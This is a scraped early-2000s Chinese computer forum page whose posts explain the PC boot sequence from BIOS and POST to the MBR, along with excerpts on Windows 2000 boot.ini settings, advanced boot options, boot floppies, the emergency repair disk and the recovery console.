 发表于 2002-02-15 00:47:55 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
是硬盘的一块特定区域，记得我以前设置过的，可现在怎么也找不到了
知道的说一声啊，谢拉

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 | 主题：boot.ini文件解释
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


计算机启动过程详解(转)

计算机技术
计算机启动过程详解(转)

上一贴 | 下一贴
发表人 主题: 计算机启动过程详解(转)
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-07 10:34:01 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 收藏该主题供以后查看 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
打开电源启动机器几乎是电脑爱好者每天必做的事情，面对屏幕上出现的一幅幅启动画面，我们一点儿也不会感到陌生，但是，计算机在显示这些启动画面时都做了些什么工作呢？相信有的朋友还不是很清楚，本文就来介绍一下从打开电源到出现Windows 9x的蓝天白云时，计算机到底都干了些什么事情。

    首先让我们来了解一些基本概念。第一个是大家非常熟悉的BIOS（基本输入输出系统），BIOS是直接与硬件打交道的底层代码，它为操作系统提供了控制硬件设备的基本功能。BIOS包括有系统BIOS（即常说的主板BIOS）、显卡BIOS和其它设备（例如IDE控制器、SCSI卡或网卡等）的BIOS，其中系统BIOS是本文要讨论的主角，因为计算机的启动过程正是在它的控制下进行的。BIOS一般被存放在ROM(只读存储芯片)之中，即使在关机或掉电以后，这些代码也不会消失。

    第二个基本概念是内存的地址，我们的机器中一般安装有32MB、64MB或128MB内存，这些内存的每一个字节都被赋予了一个地址，以便CPU访问内存。32MB的地址范围用十六进制数表示就是0～1FFFFFFH，其中0～FFFFFH的低端1MB内存非常特殊，因为最初的8086处理器能够访问的内存最大只有1MB，这1MB的低端640KB被称为基本内存，而A0000H～BFFFFH要保留给显示卡的显存使用，C0000H～FFFFFH则被保留给BIOS使用，其中系统BIOS一般占用了最后的64KB或更多一点的空间，显卡BIOS一般在C0000H～C7FFFH处，IDE控制器的BIOS在C8000H～CBFFFH处。

    好了，下面我们就来仔细看看计算机的启动过程吧。

    第一步： 当我们按下电源开关时，电源就开始向主板和其它设备供电，此时电压还不太稳定，主板上的控制芯片组会向CPU发出并保持一个RESET（重置）信号，让CPU内部自动恢复到初始状态，但CPU在此刻不会马上执行指令。当芯片组检测到电源已经开始稳定供电了（当然从不稳定到稳定的过程只是一瞬间的事情），它便撤去RESET信号（如果是手工按下计算机面板上的Reset按钮来重启机器，那么松开该按钮时芯片组就会撤去RESET信号），CPU马上就从地址FFFF0H处开始执行指令，从前面的介绍可知，这个地址实际上在系统BIOS的地址范围内，无论是Award BIOS还是AMI BIOS，放在这里的只是一条跳转指令，跳到系统BIOS中真正的启动代码处。

    第二步： 系统BIOS的启动代码首先要做的事情就是进行POST（Power－On Self Test，加电后自检），POST的主要任务是检测系统中一些关键设备是否存在和能否正常工作，例如内存和显卡等设备。由于POST是最早进行的检测过程，此时显卡还没有初始化，如果系统BIOS在进行POST的过程中发现了一些致命错误，例如没有找到内存或者内存有问题（此时只会检查640K常规内存），那么系统BIOS就会直接控制喇叭发声来报告错误，声音的长短和次数代表了错误的类型。在正常情况下，POST过程进行得非常快，我们几乎无法感觉到它的存在，POST结束之后就会调用其它代码来进行更完整的硬件检测。

    第三步： 接下来系统BIOS将查找显卡的BIOS，前面说过，存放显卡BIOS的ROM芯片的起始地址通常设在C0000H处，系统BIOS在这个地方找到显卡BIOS之后就调用它的初始化代码，由显卡BIOS来初始化显卡，此时多数显卡都会在屏幕上显示出一些初始化信息，介绍生产厂商、图形芯片类型等内容，不过这个画面几乎是一闪而过。系统BIOS接着会查找其它设备的BIOS程序，找到之后同样要调用这些BIOS内部的初始化代码来初始化相关的设备。

    第四步： 查找完所有其它设备的BIOS之后，系统BIOS将显示出它自己的启动画面，其中包括有系统BIOS的类型、序列号和版本号等内容。

    第五步： 接着系统BIOS将检测和显示CPU的类型和工作频率，然后开始测试所有的RAM，并同时在屏幕上显示内存测试的进度，我们可以在CMOS设置中自行决定使用简单耗时少或者详细耗时多的测试方式。

    第六步： 内存测试通过之后，系统BIOS将开始检测系统中安装的一些标准硬件设备，包括硬盘、CD－ROM、串口、并口、软驱等设备，另外绝大多数较新版本的系统BIOS在这一过程中还要自动检测和设置内存的定时参数、硬盘参数和访问模式等。

    第七步： 标准设备检测完毕后，系统BIOS内部的支持即插即用的代码将开始检测和配置系统中安装的即插即用设备，每找到一个设备之后，系统BIOS都会在屏幕上显示出设备的名称和型号等信息，同时为该设备分配中断、DMA通道和I/O端口等资源。

    第八步： 到这一步为止，所有硬件都已经检测配置完毕了，多数系统BIOS会重新清屏并在屏幕上方显示出一个表格，其中概略地列出了系统中安装的各种标准硬件设备，以及它们使用的资源和一些相关工作参数。

    第九步： 接下来系统BIOS将更新ESCD（Extended System Configuration Data，扩展系统配置数据）。ESCD是系统BIOS用来与操作系统交换硬件配置信息的一种手段，这些数据被存放在CMOS（一小块特殊的RAM，由主板上的电池来供电）之中。通常ESCD数据只在系统硬件配置发生改变后才会更新，所以不是每次启动机器时我们都能够看到“Update ESCD… Success”这样的信息，不过，某些主板的系统BIOS在保存ESCD数据时使用了与Windows 9x不相同的数据格式，于是Windows 9x在它自己的启动过程中会把ESCD数据修改成自己的格式，但在下一次启动机器时，即使硬件配置没有发生改变，系统BIOS也会把ESCD的数据格式改回来，如此循环，将会导致在每次启动机器时，系统BIOS都要更新一遍ESCD，这就是为什么有些机器在每次启动时都会显示出相关信息的原因。

    第十步： ESCD更新完毕后，系统BIOS的启动代码将进行它的最后一项工作，即根据用户指定的启动顺序从软盘、硬盘或光驱启动。以从C盘启动为例，系统BIOS将读取并执行硬盘上的主引导记录，主引导记录接着从分区表中找到第一个活动分区，然后读取并执行这个活动分区的分区引导记录，而分区引导记录将负责读取并执行IO.SYS，这是DOS和Windows 9x最基本的系统文件。Windows 9x的IO.SYS首先要初始化一些重要的系统数据，然后就显示出我们熟悉的蓝天白云，在这幅画面之下，Windows将继续进行DOS部分和GUI（图形用户界面）部分的引导和初始化工作。

    如果系统之中安装有引导多种操作系统的工具软件，通常主引导记录将被替换成该软件的引导代码，这些代码将允许用户选择一种操作系统，然后读取并执行该操作系统的基本引导代码（DOS和Windows的基本引导代码就是分区引导记录）。 　　上面介绍的便是计算机在打开电源开关（或按Reset键）进行冷启动时所要完成的各种初始化工作，如果我们在DOS下按Ctrl＋Alt＋Del组合键（或从Windows中选择重新启动计算机）来进行热启动，那么POST过程将被跳过去，直接从第三步开始，另外第五步的检测CPU和内存测试也不会再进行。我们可以看到，无论是冷启动还是热启动，系统BIOS都一次又一次地重复进行着这些我们平时并不太注意的事情，然而正是这些单调的硬件检测步骤为我们能够正常使用电脑提供了基础。

仿啸

话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-07 17:20:07 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
可以置顶吗
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-07 20:24:17 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
首先谢谢你的热心和对计算机版的支持，不过上面那个我的帖子不是我置顶的，我不大喜欢太多的文章置顶，总觉得这样会影响其他的朋友提问，如果大家觉得这样不好，可以提出来，我将按照大家的意愿做。
最近我也一直在想应该怎么方便大家浏览这样的教程而又不影响朋友的提问，但也没想到什么好的办法,目前能做到的就是来个教程分类汇总，全部集中在一个帖子里一起置顶，不过这样也不是直观，不知道朋友们有没有什么好的建议，不妨说说

Blueidea Web Team.
Moderator Of Computer Technology Forum
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-08 09:20:30 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
伤脑筋

一切以方便朋友为主吧

上一贴 | 下一贴
快速回复 | 主题：计算机启动过程详解(转)
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


深入了解Win2000 引导与启动 （转）

计算机技术
深入了解Win2000 引导与启动 （转）

上一贴 | 下一贴
发表人 主题: 深入了解Win2000 引导与启动 （转）
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-06 22:24:43 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
在一本书的电子版上看到的，书名是《Windows2000》，觉得挺有用，就从中摘录一点下来，供大家参考。可能内容有点枯燥，请做好心里准备

共摘抄了六部分，分别是：
一、 引导过程
二、 关于boot.ini
三、 高级选项菜单
四、 创建引导软盘
五、 创建和使用紧急修复盘（ERD）
六、 故障恢复控制台

大家可以按顺序看，也可以挑些感兴趣的看，虽说是讲2000的，但里面很多内容也适合XP.

计算机实际上有两个引导过程。首先是它本身的引导，然后是操作系统的引导。如果你将
计算机配置成双重引导，那么就可选择要引导的操作系统。当发生故障，或全部引导都失败时，
如果你事先做好了准备，就可以解决操作系统引导时出现的紧急情况。这里介绍了操作系统的
引导过程，同时介绍了与准备和排除故障有关的内容。

一、 引导过程

在安装过程中， Windows 2000的安装程序将数据写入计算机主分区（引导分区）的第一个
扇区中。这些数据就是“主引导记录（ M B R）”，它包含了X 8 6计算机可执行的指令。除了可执
行指令外， M B R还有一个最多包含4个项目的表，它定义主分区在磁盘上的位置。安装程序还把
两个初始化Windows 2000引导序列的文件（ N t l d r和N t d e t e c t . c o m）复制到引导驱动器的根目录
下。同时，文件b o o t . i n i也放置在了引导驱动器的根目录下，该文件包含了启动选项。
注意如果Windows 2000要使用的引导扇区是以前由DOS格式化的（Windows 9x和DOS一
样），Windows 2000安装程序就会将引导扇区的现有内容复制到一个名为b o o t s e c t . d o s的文
件中，并把它放在引导驱动器的根目录下。

5.1.1 MBR代码执行

在B I O S引导过程的最后一步，计算机将M B R读入内存，然后将控制交给M B R。可执行代码
在分区上搜索分区表，查找一个标识了可引导标记的分区。找到第一个可引导分区后，它会读
取该分区的第一个扇区，这就是引导扇区。
Windows 2000的启动文件位于系统分区上，操作系统文件位于引导分区上，对这两种分区
的说明如下：
. 系统分区包含引导Windows 2000所需要的硬件规格文件，包括M B R。在X 8 6计算机中，这
个分区必须是标记为活动的（ a c t i v e）主分区。它始终是驱动器0，因为它是B I O S将要访问
并把引导进程交给其M B R的驱动器。
. 引导分区包含了操作系统文件，% S y s t e m R o o t %目录。支持文件（%SystemRoot%\ System）
也必须位于引导分区。

提示 没有必要使系统分区和引导分区是同一个分区，虽然这是一种常见的做法。

......

[这消息被啸编辑过(编辑时间2002-02-07 20:29:12)]
[这消息被啸编辑过(编辑时间2002-02-19 14:02:26)]

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-06 22:25:59 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
二、 关于boot.ini

屏幕菜单的内容由b o o t . i n i确定。但是b o o t . i n i的作用不仅仅是为用户提供菜单选项。这个文
件是控制操作系统引导过程的一个重要机制。
1. Boot.ini的内容
b o o t . i n i是一个包含完成引导过程所需信息的文本文件。用户可在任何文本编辑器中编辑它
（这个文件是只读和隐藏的，所以你必须在保存编辑结果之前更改它的属性——编辑完后，不要
忘记将属性还原）。
象任何. i n i文件一样，文件的每一节都由方括号内的一个节标题开始。文件中的信息是在操
作系统安装过程中创建的，所以它是针对计算机。文件有两节：
. [boot loader]
. [operating systems]
[boot loader]节包含了超时规定和操作系统的默认路径。超时规定是一个时间量，以秒计。
在这个规定的时间里，用户可在屏幕上做出对操作系统的选择。默认情况下，超时时间是3 0秒，
用户可在屏幕上看到倒计数秒，一直到0。如果用户在这段时间内没有做出选择，默认的操作系
统就会被加载。
你可以不用编辑b o o t . i n i就更改默认的操作系统和倒计数秒的长度：
1) 在控制面板中打开“系统”小程序（最快的方法是右击“我的电脑”，然后选择“属
性”）。
2) 切换到“高级”选项卡。
3) 单击“启动和故障恢复”，进入更改默认操作系统或菜单在屏幕上显示的时间长度的字段。

警告 如果在boot.ini文件中只有一个操作系统，Windows 2000就不会等指定的时间过去后
再引导它，即使你规定超时时间为30秒、60秒，操作系统会在3秒钟后开始加载。

[operating system]节包含了安装在计算机上的操作系统的路径。在基于X 8 6的计算机上，每
个操作系统的路径都在它自己的行上输入。信息的格式基于“高级R I S C计算（A R C）”规定中的
约定。
用引号括起来的文本串会显示在屏幕上。

2. X86 ARC路径语句
在X 8 6计算机上有两种可用的A R C路径：以m u l t i ( )开始的行或以s c s i ( )开始的行。
m u l t i ( A ) d i s k ( B ) r d i s k ( C ) p a r t i t i o n ( D ) \ < % S y s t e m R o o t % >
s c s i ( A ) d i s k ( B ) r d i s k ( C ) p a r t i t i o n ( D ) \ < % S y s t e m R o o t % >
在这里：
. A是适配器的顺序号（第一个适配器是0，它应当是可引导的适配器）。
. B是磁盘参数信息，而且只与s c s i ( )语法一起使用。
. C是连接到适配器上的磁盘的顺序号。
. D是分区号，第一个编号是1（与适配器和驱动器相反，它们从0开始编号）。

6. 加强b o o t . i n i
你可以通过加强b o o t . i n i文件中的项目来增强操作系统的引导过程。
对b o o t . i n i最常见的变化是将超时时间从3 0秒改为更小的数字（你也可以象我们在本章中说
明的那样，在控制面板的“系统”小程序中进行更改）。
警告有时用户将超时时间设为0，使计算机自动引导默认的操作系统。我们不推荐这样
做，不仅因为它取消了加载以前的操作系统的机会（如果存在），而且还因为它限制了按
F8键显示排除故障菜单的能力。
与Windows NT不同，你不能取消超时限制，必须保留屏幕菜单直到用户做出选择（即使他
永远不选择）。如果编辑b o o t . i n i并将超时限制改为- 1，那么这个限制就会被忽略。在下次引导期
间，超时被复位到以前的状态。
但是，你可以强制菜单停留在屏幕上，直到你准备通过按下除E n t e r键之外的任意键，或使
用方向键加亮显示不同的选项来做出选择。因为它要求用户的干预，所以如果你的目的是将菜
单保留在屏幕上，一直到用户做出选择，那么这不会有什么帮助作用。
你可以在b o o t . i n i的行中添加开关，一些常用的参数包括如下：
. /BASEVIDEO 强制系统进入6 4 0×4 8 0 ,，1 6色的V G A模式。
. / B A U D R ATE=NNNN 设置调试端口的波特率。默认的波特率为1 9 2 0 0，但是9 6 0 0是通过
M o d e m进行远程调试的首选速率。若使用/ B A U D R AT E开关，则自动使用/ D E B U G开关。
. /BOOTLOG 将引导过程的日志写入到% S y s t e m R o o t % \ n t b t l o g . t x t中，日志文件包含了在引
导过程中加载或没有加载的驱动程序清单。
. /CRASHDEBUG 如果Windows 2000崩溃（有停止（ S TO P）错误），则为调试启用C O M
端口，但允许用户为正常的M o d e m操作而继续使用C O M端口。
. /DEBUG 启用内核调试程序，通过C O M端口执行远程实时调试。
. / D E B U G P O RT=COMX 选择一个调试端口。默认情况下，如果存在的话，调试端口是
C O M 2。如果不存在，则默认为C O M 1。
......

7. 隐藏菜单选项
你可以隐藏屏幕菜单选项。例如，如果一台计算机除了安装Windows 2000 外还安装了
Windows 9x，而你可能不希望用户启动以前的操作系统，但又不想删除它（以免将来因为某些
原因需要让用户访问Windows 9x）。这也是一种隐藏已安装的Windows 2000 Server，并允许用户
访问Windows 2000 Professional的方式，反之亦然。
要使菜单项不可访问，在b o o t . i n i文件中，在希望屏幕菜单结束的地方添加[any text]项，那
么该项以下的内容都是不可见和不可访问的。例如，这里有一个禁止用户访问Windows 95的
b o o t . i n i文件：

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partion(1)\WINNT="Windows 2000 Professional"
[any text]
c:\="Microsoft Windows"

如果想允许访问[any text]以下的项，只要删除[any text]即可。

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-06 22:26:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
三、 高级选项菜单
如果操作系统出现引导故障，那么再次重新启动计算机，而且这次使用“高级选项”菜单。
当菜单出现时，注意屏幕底部的一行：
要排除故障并进入Windows 2000的高级启动选项，按F 8键
按F 8键可以显示一个包含如下选项的菜单，它是为帮助用户修复妨碍正常引导的故障而设
计的。
. 安全模式
. 带网络连接的安全模式
. 带命令提示的安全模式
. 启用启动日志
. 启动V G A模式
. 最后一次正确的配置
. 目录服务恢复模式（只适用域控制器）
. 调试模式
注意如果你使用远程安装服务安装Windows 2000，那么高级启动选项可能包含有关R I S
的其他选项。
使用方向键选取要使用的启动选项，然后按回车键，返回最初的引导菜单。然后再选取使
用你所选择的高级选项进行启动的操作系统。
警告如果选取了一个高级选项，那么必须在最初的菜单中选择一个Windows 2000的版本。
不要尝试和以前的Windows版本一起使用任何高级选项。
如果要返回最初的引导菜单，而不选择任何高级选项，那么按E S C键。
5.2.1 安全模式
安全模式最有用的部分是允许访问所有的驱动器，而不管文件系统。如果它可以工作，那
么你可以更改配置来纠正问题。例如，在删除最近安装的不能正常工作的驱动程序，或撤消某
些已实施的配置方案时，通常需要进入安全模式。
. 安全模式只加载基本的文件以及使操作系统启动并运行的驱动程序：鼠标、监视器、键
盘、存储器、基本的视频和默认的系统服务。
. 带网络连接的安全模式添加了网络支持（N I C驱动程序），但是不能在PCMCIA NIC下工
作。
. 带命令提示的安全模式与安全模式一样，除了引导过程以一个命令窗口，而不是G U I结
束。
注意使用任意安全模式选项会导致日志文件写入%SystemRoot%\ntbtlog.txt，参见本节中
的“启用引导日志”。
5.2.2 启用启动日志
这个选项指示Windows 2000创建一个日志文件（ % S y s t e m R o o t % \ n t b t l o g . t x t）。文件显示了
所有加载或没有加载的驱动程序清单。下面是一个典型的n t b t l o g . t x t文件的一小部分（顺便说一
下，这是个U n i c o d e文件）：
5.2.3 启动VGA模式
Windows NT 4用户可能熟悉这个选项，它使用基本的V G A驱动程序启动Windows 2000。为
工作不正常的视频卡（操作系统在下次引导中装载G U I时，它是非常明显的）安装完新的视频驱
动程序后使用这个选项。基本的视频驱动程序和以任何安全模式启动Windows 2000时使用的是
一样的。
5.2.4 最后一次正确的配置
利用这个选项可以使用上次关机时保存在注册表中的设置启动Windows 2000。这个选项能
够解决因驱动程序丢失或崩溃而导致的故障，它对于覆盖由于上次会话中对配置所做的更改而
导致的故障是很有用的。丢弃这些更改通常是一件好事。
5.2.5 目录服务恢复模式
这个选项只能用于域控制器，它恢复% S y s t e m R o o t % S y s v o l目录和Active Directory。S y s v o l
目录存储域的公共文件，它们在域控制器之间复制。
5.2.6 调试模式
使用这个选项启动Windows 2000，并通过串行电缆将调试信息发送到另一台计算机上。

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-06 22:27:28 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
四、 创建引导软盘
如果在操作系统的引导过程中，以前加载的某个文件（ n t l d r、n t d e t e c t . c o m或b o o t . i n i）丢失
或崩溃，则不能进入高级菜单选项来修复系统。你可以通过使用专门为Windows 2000安装创建
的引导盘来解决这个问题。
5.3.1 在自己的系统上创建引导软盘
如果明智的话，只要你的Windows 2000安装一结束并且能运行（无错误），就要创建一个引
导软盘。不幸的是，很少用户能听得进这个忠告，在没有出现引导故障之前，他们认为没有必
要创建引导软盘。尽管如此，如果你是一个机智的、凡事考虑在前的人，那么按如下步骤完成
这项任务：
1 ) 将一张软盘插入到驱动器中。
2) 打开“我的电脑”或“Wi n d o w s资源管理器”，右击软盘驱动器对象。
3) 从快捷方式菜单中选择“格式化”，并使用默认的选项格式化软盘上。
4 ) 将以下文件从硬盘驱动器的根目录复制到软盘上：
. Ntdetect.com
. Ntldr. c o m
. Boot.ini
. Ntbootdd.sys
通过启动操作系统来测试这张软盘。
注意只有存在一个S C S I系统时，才存在n t b o o t d d . s y s文件，它是你重命名的S C S I驱动程
序。
5.3.2 在另一台Windows 2000计算机上创建引导软盘
如果没来得及创建引导软盘，系统就被破坏了，而且你需要引导软盘启动它，那么可以在
另一台运行同样版本（ P r o f e s s i o n a l或其中一个S e r v e r版本）和相同文件系统（ N T F S、FAT或
FAT 3 2）的Windows 2000计算机上创建引导软盘。
1) 按照在自己的计算机上创建引导盘的步骤创建一张引导软盘。
2) 打开b o o t . i n i并检查它，确保它与你自己的配置相匹配。如果不匹配，根据在“关于
b o o t . i n i”一节中的说明调整设置。
3) 如果你有一个不同的S C S I控制器，那么找到正确的驱动程序文件，然后把它复制到软盘
上，删除从创建引导盘的计算机上复制的n t b o o t d d . s y s文件，再把你自己的S C S I驱动程序重命名
为n t b o o t d d . s y s。
4) 如果源计算机使用一个I D E控制器，并且你的系统有一个S C S I控制器，那么使用记事本
调整b o o t . i n i文件中的设置，然后将正确的S C S I 驱动程序复制到软盘，并把它重命名为
n t b o o t d d . s y s。
5) 如果源计算机使用一个S C S I控制器，而且系统中有一个I D E控制器，那么使用记事本调
整b o o t . i n i文件中的设置，如果从源计算机上复制了n t b o o t d d . s y s文件，就将它删除。
在你的计算机上测试引导软盘。
5.3.3 在运行不同Windows版本的计算机上创建引导软盘
如果你找不到运行同一版本的Windows 2000和使用相同文件系统的计算机，你仍然可以创
建用于你的计算机的引导软盘。你需要下列东西：
. 一张空白软盘。
. 1#安装盘（包含在Windows 2000包中的其中一张软盘）。
. Windows 2000的C D - R O M原始介质（如果原始文件在网络服务器上，就不需要C D - R O M）。
. SCSI 控制器的驱动程序文件（如果计算机有一个S C S I控制器）。
注意如果你找不到Windows 2000介质的软盘，可以使用本章后面的“创建Windows 2000
软盘”一节中的介绍的方法来创建它。
你可以在有C D - R O M驱动器（在其中插入Windows 2000的C D - R O M）或能通过网络共享访
问Windows 2000光盘上的文件副本的任何一台计算机来执行这项任务：
1) 在软盘驱动器中插入Windows 2000的第一张安装盘，然后打开“我的电脑”，右击“软盘
驱动器”对象。
2) 从快捷方式菜单中选择“复制磁盘”。
3) 按照提示插入源盘（ 1 #安装盘），然后是目标盘（你的空白软盘），直到复制过程结束。
4) 删除新软盘上的所有文件。
5) 将C D - R O M或网络共享节点i 3 8 6目录下的n t d e t e c t . c o m和n t l d r文件复制到新软盘。
6) 将n t l d r重命名为s e t u p l d r. b i n。
7) 打开记事本并创建一个b o o t . i n i文件，将它保存在新软盘上（见下一节“创建快速的
B o o t . i n i文件）。
8) 如果你的计算机有一个S C S I控制器，那么将正确的驱动程序复制到新软盘上，然后重命
名为n t b o o t d d . s y s。
9) 回到你的计算机上，使用新软盘引导系统，并登录。
10) 将Windows 2000 CD-ROM放到C D - R O M驱动器中，或访问存储Windows 2000文件的网
络共享。
11) 将n t l d r从i 3 8 6目录复制到你的硬盘驱动器的根目录下。
当在没有运行Windows 2000的计算机上创建引导软盘时，我无法解释的一个事实是：你不
能简单地将n t l d r复制到新软盘上并使用它（没有将它重命名）。我试过，在引导过程中，软盘被
访问后立即出现有关n t l d r的错误信息。但按照这里说明的步骤会工作得很好。
5.3.4 创建快速boot.ini文件
你的快速b o o t . i n i文件只加载Windows 2000，所有没有必要担心b o o t . i n i文件中涉及另一个操
作系统的行，即使你的计算机配置成了双重引导。下面是一个示例：
. 如果计算机从I D E或E I D E硬盘驱动器上引导，将s c s i ( 0 )替换成m u l t i ( 0 )。
. 如果Windows 2000系统文件不在名为Wi n n t的目录下，那么使用正确的名称替换这两个实
例。
. 如果有多个控制器、驱动器或分区，那么阅读本章前面的5 . 1 . 8节，确保引用了正确的硬
件。
警告在Windows 2000 Professional中创建的磁盘不能用于Windows 2000 Server，反之亦
然。

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-06 22:28:46 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
五、 创建和使用紧急修复盘（ERD）
Windows 2000处理E R D的创建和使用的方式与以前的Windows NT版本有很大的不同。你会
发现它不如以前的强大（但从另一个方面讲，在Windows 2000中有一些在Windows NT中不存在
的附加的修复和恢复过程）。
5.4.1 ERD的功能
E R D可以帮助修复下列元素出现的故障：
. 系统文件
. 分区的引导扇区
. 双重引导系统的环境设置
不能使用E R D修复注册表故障。
5.4.2 创建ERD
如果你使用过以前的Windows NT，那么可能会对Windows 2000 的E R D功能感到失望。
R d i s k . e x e已经没有了，代之以遍历菜单项目层来创建E R D。
E R D是备份功能集的一部分，若要启动它，单击下列菜单命令：
1) 开始
2) 程序
3) 附件
4) 系统工具
5) 备份
当备份程序窗口打开时，从菜单栏上单击“工具” |“创建一张紧急修复软盘”。这时会打开
一个对话框，要求你在驱动器A中插入一张空白的已格式化软盘。然后，单击“确定”。过了一
会儿，出现一个对话框告诉你修复数据已经成功地保存了。给E R D磁盘贴上标签，并把它放在
一个安全的地方。
E R D中有下列文件：
. Autoexec.bat
. Config.nt
. Setup.log
S e t u p . l o g是一个已加载的文件和驱动程序的清单，其中还有计算机的配置信息，图5 - 2显示
了这个文件的一部分。
图5-2 ERD中的setup.log文件含有系统的配置信息
提示改变系统的配置后应重新创建ERD。
5.4.3 使用ERD
如果操作系统不能引导，可以使用E R D尝试修复安装。如果故障是由系统文件或双重引导
设置的丢失或崩溃造成的，那么这样做通常能修复它。E R D不能修复注册表。
在修复系统时，实际上开始了Windows 2000的另一次安装。
. 如果计算机不能从C D - R O M引导，就使用Windows 2000的1 #安装软盘引导。
. 如果计算机能从C D - R O M引导，可使用Windows 2000的C D或1 #安装软盘。
. 基于A l p h a的计算机必须使用C D。
Windows 2000要完成安装程序。在这个过程的结尾，安装程序发现Windows 2000已经安装
了，因此为用户提供了需要执行修复的选项。这时屏幕上出现一个安装消息，显示如下3个选择：
. 现在安装Windows 2000，按回车键。
. 修复Windows 2000的安装，按R键。
. 退出安装程序，不安装Windows 2000，按F 3键。
按R显示修复菜单，它提供两个选择：
. 使用故障恢复控制台修复Windows 2000安装，按C键。
. 使用紧急修复过程修复Windows 2000安装，按R键。
按R使用紧急修复进程。下一屏包含了一条消息，它实质上是警告你这是一个不确定的过程。
此外，还要求你选择是手工修复（按M键）还是快速修复（按F键）。
手工修复让你决定修复的过程—你可以替换系统文件、分区引导扇区或启动环境。注册表
不能修复。安装程序将要求你在驱动器A中插入E R D。
快速修复将修复过程交给安装程序。安装程序将尝试修复系统文件、分区引导扇区、启动
环境和注册表（注册表修复过程将恢复在首次安装Windows 2000时创建的注册表）。选择完要
安装程序执行的任务后，你会被提示插入E R D。
注意即使你没有E R D，也可以使用这些修复选项中的一个。如果按L，安装程序将搜索
Windows 2000的安装文件。
任务执行完后，重新启动计算机。如果操作系统仍不能启动，就必须重新安装Windows 2000。

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-06 22:30:10 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
六、 故障恢复控制台
故障恢复控制台是一个命令行程序，可用来修复系统故障。虽然这个功能提供了一个有限
的命令集，但是可用来修复M B R、复制丢失或崩溃的系统文件，和重新配置工作不正常（或不
完全正常）的服务。
有两种使用故障恢复控制台的方式：
. 使用Windows 2000安装盘或可引导的Windows 2000 CD进入控制台选项。
. 安装故障恢复控制台，并使它在Windows 2000的引导菜单中可用。
5.5.1 使用安装程序访问故障恢复控制台
当操作系统根本不引导或引导时出现了太多的故障，使你明白显然有问题时，这种方法可
作为一种急救方法。
首先用1 #安装引导盘引导计算机，然后在Windows 2000准备安装它自己的同时，根据提示
插入其他的3张软盘。当最后一张软盘完成它的工作后，一个欢迎安装的消息出现在屏幕上，这
个消息显示3个选项：
. 若要立即安装Windows 2000，按回车键。
. 若要修复Windows 2000的安装，按R键。
. 若要退出安装程序，不安装Windows 2000，按F 3键。
按R显示修复菜单，它提供了两个选择：
. 使用故障恢复控制台修复Windows 2000安装，按C键。
. 使用紧急修复过程修复Windows 2000安装，按R键。
